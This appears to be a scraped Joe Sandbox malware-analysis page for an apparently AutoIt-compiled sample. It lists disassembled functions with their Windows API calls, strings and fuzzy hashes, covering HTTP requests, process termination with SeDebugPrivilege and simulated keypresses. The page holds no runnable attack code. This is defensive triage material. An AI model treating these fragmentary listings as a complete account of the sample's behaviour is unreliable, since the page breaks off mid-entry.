Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: b34a0b909cd4bdb8116cc90be0b486f1dac1784e9e939d149d458d2258716faf
Instruction ID: b54f5754329c1fa144bdd395c15c119f733d4c8b3f56dd776c2c66d2417357f8
Opcode Fuzzy Hash: b34a0b909cd4bdb8116cc90be0b486f1dac1784e9e939d149d458d2258716faf
Instruction Fuzzy Hash: BFD168316022129FCB29EF18C8A9B79F7E4BF15700F5445EDE54AAB262CB70AD16CF50

Function 00C27DF0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00C27FAD
SetCurrentDirectoryW.KERNEL32(?), ref: 00C27FC1
GetFileAttributesW.KERNEL32(?), ref: 00C27FEB
SetFileAttributesW.KERNEL32(?,00000000), ref: 00C28005
SetCurrentDirectoryW.KERNEL32(?), ref: 00C28017
SetCurrentDirectoryW.KERNEL32(?), ref: 00C28060
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00C280B0

Strings

*.*, xrefs: 00C28066

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: CurrentDirectory$AttributesFile
String ID: *.*
API String ID: 769691225-438819550
Opcode ID: 342419e29fca9d2f868420a086b053a0139dc5881181ca7e59168b3eb6e42f9a
Instruction ID: 7e0f77e323425064f2d46d4f24be92261b22408ae793561fb16716f083d40fe9
Opcode Fuzzy Hash: 342419e29fca9d2f868420a086b053a0139dc5881181ca7e59168b3eb6e42f9a
Instruction Fuzzy Hash: 0981CF725082119FCB20EF15D880ABEB3E8BF89310F15499EF895C7650EB74DE48CB62

Function 00BB5BEA Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 00BB5C7A

Part of subcall function 00BB5D0A: GetClientRect.USER32(?,?), ref: 00BB5D30
Part of subcall function 00BB5D0A: GetWindowRect.USER32(?,?), ref: 00BB5D71
Part of subcall function 00BB5D0A: ScreenToClient.USER32(?,?), ref: 00BB5D99

GetDC.USER32 ref: 00BF46F5
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00BF4708
SelectObject.GDI32(00000000,00000000), ref: 00BF4716
SelectObject.GDI32(00000000,00000000), ref: 00BF472B
ReleaseDC.USER32(?,00000000), ref: 00BF4733
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00BF47C4

Strings

U, xrefs: 00BF4693

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: cf5698a62871a2bb1be84a609a530086dab194572b20b930185b23c3cf8928bc
Instruction ID: 168d25aadb360cf69b1ccce38cf3359937b7a9c56f9fc6722fbed237db997e4e
Opcode Fuzzy Hash: cf5698a62871a2bb1be84a609a530086dab194572b20b930185b23c3cf8928bc
Instruction Fuzzy Hash: 7F71BA34400209EFCF219F64C984BFA7BF6FF4A360F1842A9EA559B2A6C7709C45DB51

Function 00C2359C Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 150COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 00C235E4

Part of subcall function 00BB9CB3: _wcslen.LIBCMT ref: 00BB9CBD

LoadStringW.USER32(00C82390,?,00000FFF,?), ref: 00C2360A

Strings

^ ERROR, xrefs: 00C236C9
"%s" (%d) : ==> %s:%s%s, xrefs: 00C23724
Error: , xrefs: 00C236EF
Line %d (File "%s"):, xrefs: 00C2366B
"%s" (%d) : ==> %s:, xrefs: 00C23742

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: LoadString$_wcslen
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 4099089115-2391861430
Opcode ID: c6f9a6a82a586a6a5c524c88df557d9bfb7167697d1488d15a8024146ab1498f
Instruction ID: 43fdd88d30e17fda2e0d85528493623801b69f48b87dc13b6d99c9052783bb36
Opcode Fuzzy Hash: c6f9a6a82a586a6a5c524c88df557d9bfb7167697d1488d15a8024146ab1498f
Instruction Fuzzy Hash: 70516A71800219ABCF14EBA0DC82EFEBBB8EF04740F1441A5F505720A1EB705B99EFA4

Function 00C48B02 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00BC9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00BC9BB2

Part of subcall function 00BC912D: GetCursorPos.USER32(?), ref: 00BC9141
Part of subcall function 00BC912D: ScreenToClient.USER32(00000000,?), ref: 00BC915E
Part of subcall function 00BC912D: GetAsyncKeyState.USER32(00000001), ref: 00BC9183
Part of subcall function 00BC912D: GetAsyncKeyState.USER32(00000002), ref: 00BC919D

ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?,?), ref: 00C48B6B
ImageList_EndDrag.COMCTL32 ref: 00C48B71
ReleaseCapture.USER32 ref: 00C48B77
SetWindowTextW.USER32(?,00000000), ref: 00C48C12
SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00C48C25
DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?,?), ref: 00C48CFF

Strings

@GUI_DRAGFILE, xrefs: 00C48C9A
@GUI_DROPID, xrefs: 00C48C51

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
String ID: @GUI_DRAGFILE$@GUI_DROPID
API String ID: 1924731296-2107944366
Opcode ID: f95ec7923e72560e5dfa94e36071c3a898e6d9a8d9c74377267c8ec8f64f0e43
Instruction ID: e2c436d64f04251b2e66df2b0fd80ec0d0ece9f47b3965273617099a85495a79
Opcode Fuzzy Hash: f95ec7923e72560e5dfa94e36071c3a898e6d9a8d9c74377267c8ec8f64f0e43
Instruction Fuzzy Hash: 50516970505204AFD704EF24DC96FAE77E8FB88714F14066DF996A72E1CB709A08CB62

Function 00C2C253 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00C2C272
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00C2C29A
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00C2C2CA
GetLastError.KERNEL32 ref: 00C2C322
SetEvent.KERNEL32(?), ref: 00C2C336
InternetCloseHandle.WININET(00000000), ref: 00C2C341

Strings

, xrefs: 00C2C2BB

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 3113390036-3916222277
Opcode ID: 1cb546222e18bd81522cd01846393d9b4e709142b6b376a373edf52154164cdc
Instruction ID: 6611e395ee76f40ac32a1b6cdc6c55682e4eb07e3a016c48413939f40d9bd518
Opcode Fuzzy Hash: 1cb546222e18bd81522cd01846393d9b4e709142b6b376a373edf52154164cdc
Instruction Fuzzy Hash: 38319CB1500614AFD721DFA5A8C8BAF7AFCEB49740B10891AA45692620DB74DD049B60

Function 00C1989B Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00BF3AAF,?,?,Bad directive syntax error,00C4CC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 00C198BC
LoadStringW.USER32(00000000,?,00BF3AAF,?), ref: 00C198C3

Part of subcall function 00BB9CB3: _wcslen.LIBCMT ref: 00BB9CBD

MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00C19987

Strings

%s (%d) : ==> %s.: %s %s, xrefs: 00C198F1
Line %d:, xrefs: 00C19912
Line %d (File "%s"):, xrefs: 00C1992D
Error: , xrefs: 00C19955
., xrefs: 00C1996D

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: HandleLoadMessageModuleString_wcslen
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 858772685-4153970271
Opcode ID: 5587f06ef9e1318d4575dbd0cd29a040ed750921d410ad162f7f6708848e0f5e
Instruction ID: 69a1af26f095741c7d6af19b1254014bf8e10b848a39d3d99596492196da0c41
Opcode Fuzzy Hash: 5587f06ef9e1318d4575dbd0cd29a040ed750921d410ad162f7f6708848e0f5e
Instruction Fuzzy Hash: B5217E3180021ABBCF15AF90CC56EFE7BB5FF19700F0444A9F519660A2EBB19A58DB10

Function 00C1209F Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 00C120AB
GetClassNameW.USER32(00000000,?,00000100), ref: 00C120C0
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00C1214D

Strings

details, xrefs: 00C120FB
list, xrefs: 00C1212F
smallicons, xrefs: 00C12115
largeicons, xrefs: 00C120E1
SHELLDLL_DefView, xrefs: 00C120CC

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: ClassMessageNameParentSend
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1290815626-3381328864
Opcode ID: 0e49b6b4a0179441673d744c57fbef0bb6c42d40f5150509763cb068956cbf6f
Instruction ID: 87df851577149b32b7a61761e2388d99a6031fed9c205d29e35528f4768d1b53
Opcode Fuzzy Hash: 0e49b6b4a0179441673d744c57fbef0bb6c42d40f5150509763cb068956cbf6f
Instruction Fuzzy Hash: 78113A7E684706BBF605A220DC06DFE779CDB07324B305066FB08A40E1FBA15C916514

Function 00BECE90 Relevance: 13.7, APIs: 9, Instructions: 209COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 00BECEB7
_free.LIBCMT ref: 00BECF22
_free.LIBCMT ref: 00BECF48
_free.LIBCMT ref: 00BECF71
_free.LIBCMT ref: 00BECFA9
_free.LIBCMT ref: 00BECFDA
_free.LIBCMT ref: 00BED01B
SetEnvironmentVariableA.KERNEL32(00000000,00000000), ref: 00BED09C
_free.LIBCMT ref: 00BED0B5

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: _free$EnvironmentVariable___from_strstr_to_strchr
String ID:
API String ID: 1282221369-0
Opcode ID: 1b6536133b65070c620eafd8be89a9b1dc84dc6366eff8163411dd95d5db8dc3
Instruction ID: 7491396068312c92a3a0a9c278358dabb7f8cf52fbccc254aa35cfe73fb254a7
Opcode Fuzzy Hash: 1b6536133b65070c620eafd8be89a9b1dc84dc6366eff8163411dd95d5db8dc3
Instruction Fuzzy Hash: A8614572904294AFDB21AFB69891B6D7FE9EF05320F1441EEF90497383D7359D0A8790

Function 00C450D4 Relevance: 13.7, APIs: 9, Instructions: 162windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00C45186
ShowWindow.USER32(?,00000000), ref: 00C451C7
ShowWindow.USER32(?,00000005,?,00000000), ref: 00C451CD
SetFocus.USER32(?,?,00000005,?,00000000), ref: 00C451D1

Part of subcall function 00C46FBA: DeleteObject.GDI32(00000000), ref: 00C46FE6

GetWindowLongW.USER32(?,000000F0), ref: 00C4520D
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00C4521A
InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00C4524D
SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00C45287
SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00C45296

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
String ID:
API String ID: 3210457359-0
Opcode ID: 00078fb5f5da09d7748566de893fd07db14f6f85e03f3a968f66527311932297
Instruction ID: 828e3677ec630333469b05fbd03790d3729eb5bc416031c3b060cef939558dac
Opcode Fuzzy Hash: 00078fb5f5da09d7748566de893fd07db14f6f85e03f3a968f66527311932297
Instruction Fuzzy Hash: 13519134A41A08FFEF309F25CC49BDD3BA5FB05321F148116FA25962E2C7B5AA80DB41

Function 00BC8B06 Relevance: 13.7, APIs: 9, Instructions: 155windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00C06890
ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 00C068A9
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00C068B9
ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 00C068D1
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00C068F2
DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00BC8874,00000000,00000000,00000000,000000FF,00000000), ref: 00C06901
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00C0691E
DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00BC8874,00000000,00000000,00000000,000000FF,00000000), ref: 00C0692D

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend
String ID:
API String ID: 1268354404-0
Opcode ID: f595a9d709f3215acf92e7adcad656689b50127e8f239ff1f77c699e9c7289fd
Instruction ID: 83336b0f095f005bc39fdcb1c581b3f5a29e113ed5f022e44fe1f6996a726a3c
Opcode Fuzzy Hash: f595a9d709f3215acf92e7adcad656689b50127e8f239ff1f77c699e9c7289fd
Instruction Fuzzy Hash: A0516570600209AFEB208F24CC95FAA7BF5FB48760F104558F956972E0DB71AE91DB50

Function 00C2C143 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00C2C182
GetLastError.KERNEL32 ref: 00C2C195
SetEvent.KERNEL32(?), ref: 00C2C1A9

Part of subcall function 00C2C253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00C2C272
Part of subcall function 00C2C253: GetLastError.KERNEL32 ref: 00C2C322
Part of subcall function 00C2C253: SetEvent.KERNEL32(?), ref: 00C2C336
Part of subcall function 00C2C253: InternetCloseHandle.WININET(00000000), ref: 00C2C341

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
String ID:
API String ID: 337547030-0
Opcode ID: 2e0118ab5c7c7f4812316c387ddf06eaa4bf71270e380b8586ea0891a2cf7584
Instruction ID: b20ab6a616ac72410be9d64f5cb377f8daa4feef14744f2044d5a4367f3b6e2d
Opcode Fuzzy Hash: 2e0118ab5c7c7f4812316c387ddf06eaa4bf71270e380b8586ea0891a2cf7584
Instruction Fuzzy Hash: 66318E75201611EFDB219FA5ED84B6EBBF8FF19300B00441DF96683A20DB71E914EBA0

Function 00C125A2 Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00C13A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00C13A57
Part of subcall function 00C13A3D: GetCurrentThreadId.KERNEL32 ref: 00C13A5E
Part of subcall function 00C13A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00C125B3), ref: 00C13A65

MapVirtualKeyW.USER32(00000025,00000000), ref: 00C125BD
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00C125DB
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00C125DF
MapVirtualKeyW.USER32(00000025,00000000), ref: 00C125E9
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00C12601
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00C12605
MapVirtualKeyW.USER32(00000025,00000000), ref: 00C1260F
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00C12623
Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00C12627

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: 7f05702f6d4dbf18a781573c03e1b2a38f1a6d333dcc52a9d92f2c8c568b4efe
Instruction ID: c852768b4effc6d84100fca3e12930fa4acaa517b1191346c84da62220f842bb
Opcode Fuzzy Hash: 7f05702f6d4dbf18a781573c03e1b2a38f1a6d333dcc52a9d92f2c8c568b4efe
Instruction Fuzzy Hash: 6301D834791650BBFB1067699CCAF9D3F59EF4FB11F104001F318AE0E1C9E11454AAA9

Function 00C11803 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00C11449,?,?,00000000), ref: 00C1180C
HeapAlloc.KERNEL32(00000000,?,00C11449,?,?,00000000), ref: 00C11813
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00C11449,?,?,00000000), ref: 00C11828
GetCurrentProcess.KERNEL32(?,00000000,?,00C11449,?,?,00000000), ref: 00C11830
DuplicateHandle.KERNEL32(00000000,?,00C11449,?,?,00000000), ref: 00C11833
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00C11449,?,?,00000000), ref: 00C11843
GetCurrentProcess.KERNEL32(00C11449,00000000,?,00C11449,?,?,00000000), ref: 00C1184B
DuplicateHandle.KERNEL32(00000000,?,00C11449,?,?,00000000), ref: 00C1184E
CreateThread.KERNEL32(00000000,00000000,00C11874,00000000,00000000,00000000), ref: 00C11868

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: 145c4001431b4a696471c36ba92c63177701b28e586bd45cc89cb91715e720ed
Instruction ID: f97ac1a25f3113646b881a167be08c480673efa5413900c2d8b279dc182cc309
Opcode Fuzzy Hash: 145c4001431b4a696471c36ba92c63177701b28e586bd45cc89cb91715e720ed
Instruction Fuzzy Hash: 2D01AC75641304BFE650ABA5DC89F5F3B6CFB8AB11F014411FA05DB1A1C67498108B20

Function 00C3A0E2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON

Download Yara Rule

APIs

Part of subcall function 00C1D4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 00C1D501
Part of subcall function 00C1D4DC: Process32FirstW.KERNEL32(00000000,?), ref: 00C1D50F
Part of subcall function 00C1D4DC: CloseHandle.KERNEL32(00000000), ref: 00C1D5DC

OpenProcess.KERNEL32(00000001,00000000,?), ref: 00C3A16D
GetLastError.KERNEL32 ref: 00C3A180
OpenProcess.KERNEL32(00000001,00000000,?), ref: 00C3A1B3
TerminateProcess.KERNEL32(00000000,00000000), ref: 00C3A268
GetLastError.KERNEL32(00000000), ref: 00C3A273
CloseHandle.KERNEL32(00000000), ref: 00C3A2C4

Strings

SeDebugPrivilege, xrefs: 00C3A18F

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

